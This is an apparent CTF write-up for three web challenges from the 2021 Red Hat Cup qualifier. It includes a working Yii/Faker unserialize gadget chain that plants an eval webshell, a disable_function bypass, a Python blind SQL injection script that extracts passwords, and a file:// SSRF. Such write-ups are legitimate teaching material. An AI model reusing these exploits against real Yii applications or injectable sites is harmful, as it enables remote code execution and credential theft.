红帽杯2021 Qual WriteUp
Web
find_it
- robots.txt -> hint: 1ndexx.php
- .1ndexx.php.swp
- index.php?code= 写 phpinfo() 至 hack.php
- hack.php phpinfo ICQ_FLAG
framework
- www.zip
- SiteController actionAbout unserialize
- https://xz.aliyun.com/t/8307
// Gadget chain for the unserialize() sink in SiteController::actionAbout (see the linked
// xz.aliyun.com write-up). Class names, property names and visibilities must match the
// framework's own classes exactly, because serialize() emits them verbatim and the
// receiving side rebuilds the real objects; only the property values are chosen here.
// Mitigation on the application side: never pass request data to unserialize() -- use
// json_decode() for data interchange, or at minimum unserialize($s, ['allowed_classes' => false]).
namespace yii\rest{
// Final link. NOTE(review): the chain presumably relies on the framework's CreateAction::run()
// invoking call_user_func($this->checkAccess, $this->id) before doing any work -- confirm
// against the vendored Yii version shipped in www.zip.
class CreateAction{
public $checkAccess;
public $id;
public $modelClass;
public function __construct(){
// On PHP 7.x assert() still evaluates a string argument as PHP code, which is what turns
// the call_user_func() above into code execution; $id becomes that string.
$this->checkAccess = 'assert';
$this->id = 'eval($_REQUEST[cmd]);';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
// Middle link. NOTE(review): presumably Generator::__call() resolves an unknown method
// through $this->formatters[$method] and calls it, so ->close() on this object reaches
// CreateAction::run -- confirm in the vendored Faker source.
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction, 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
// Entry point. NOTE(review): presumably BatchQueryResult::__destruct() tears down its reader
// via $this->_dataReader->close(); destructors run on unserialize()'d objects as soon as they
// are released, which is why no further interaction is needed -- confirm in yii\db.
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
// base64 keeps the payload transport-safe: private property names are serialized with
// embedded NUL bytes, which do not survive a plain URL/POST parameter.
echo base64_encode(serialize(new yii\db\BatchQueryResult));
} - AntSword 插件 disable_function bypass apache_mod_cgi
- /readflag
WebsiteManger
- image.php?id=1 sqli
21import requests
import string
# Boolean-based blind SQL injection through the `id` parameter of image.php: the response is
# a JPEG (contains the 'JFIF' marker) only when the injected condition holds, so each
# character of the target column is recovered by binary search over its ASCII code.
# Server-side this is easy to spot -- a numeric `id` carrying `if(ascii(substr(` and `/**/`
# sequences -- and a parameterized query removes the injection entirely.
url = 'http://eci-2zeekzpgsy8b5x80zvx9.cloudeci1.ichunqiu.com'
# Characters recovered so far; `len(result)` doubles as the next substr() offset.
result: str = ''
# NOTE(review): this loop has no exit condition; it runs until interrupted.
while True:
# Search window for one character: ASCII 33..129, i.e. printable characters.
L = 33
R = 130
while(L<R):
mid = (L+R)//2
print('Testing: {}'.format(chr(mid)))
# `%26%26` is a URL-encoded `&&`; `/**/` is used in place of every space (presumably to
# get past a whitespace filter). The if() yields 0 (no image) when the probed character's
# code is above `mid`, else 1.
r = requests.get(url+'/image.php?id=1/**/%26%26/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/ctf.users),{},1))>{},0,1)/**/#'.format(len(result), mid))
if b'JFIF' not in r.content:
# No image => condition was false => the character's code is greater than `mid`.
L = mid+1
else:
R = mid
# L == R here, so R is the recovered code point.
result += chr(R)
print('Result: {}'.format(result))
# username: admin
# password: 23e8f0348cda6f40eff1f(容器重启后变化) - POST modify.php host=file:///flag